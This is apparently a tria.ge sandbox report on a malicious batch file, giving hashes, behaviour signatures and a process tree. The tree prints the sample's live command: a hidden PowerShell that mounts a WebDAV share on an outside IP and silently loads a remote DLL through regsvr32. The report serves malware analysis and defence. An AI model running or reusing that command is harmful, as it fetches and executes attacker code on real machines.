Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
19/07/2024, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat
Resource
win10v2004-20240709-en
General
-
Target
5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat
-
Size
15KB
-
MD5
bdf3d064c172015f3f49bbabc00c7e4a
-
SHA1
3261d02778ef25bd8a3067f25d0c9f103100bcbe
-
SHA256
5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156
-
SHA512
85a93a7fcdc0eb60ad360dc8c248c3aef6cbad3919933068e414276de1a60cf0cf842ca7b4514bb53e3aa0c027e8dd7becdad0698c03d53635459059411031af
-
SSDEEP
384:BdQT+1v7GWrOQcqT+PTFWvgiD8AhRqdia4nIk1dtt7ttqjEFPx7s01f:bz1FfqUPDGGhXFZ401f
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2944 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2576 wordpad.exe 2576 wordpad.exe 2576 wordpad.exe 2576 wordpad.exe 2576 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2576 2316 cmd.exe 31 PID 2316 wrote to memory of 2576 2316 cmd.exe 31 PID 2316 wrote to memory of 2576 2316 cmd.exe 31 PID 2316 wrote to memory of 2944 2316 cmd.exe 32 PID 2316 wrote to memory of 2944 2316 cmd.exe 32 PID 2316 wrote to memory of 2944 2316 cmd.exe 32 PID 2944 wrote to memory of 2804 2944 powershell.exe 34 PID 2944 wrote to memory of 2804 2944 powershell.exe 34 PID 2944 wrote to memory of 2804 2944 powershell.exe 34 PID 2944 wrote to memory of 2724 2944 powershell.exe 35 PID 2944 wrote to memory of 2724 2944 powershell.exe 35 PID 2944 wrote to memory of 2724 2944 powershell.exe 35 PID 2944 wrote to memory of 2724 2944 powershell.exe 35 PID 2944 wrote to memory of 2724 2944 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\5e13d1b252311c680b84c1c87c7487bf7724609c9bf572b72db0a49168dbf156.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\47312627127348.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2804
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\47312627127348.dll3⤵PID:2724
-
-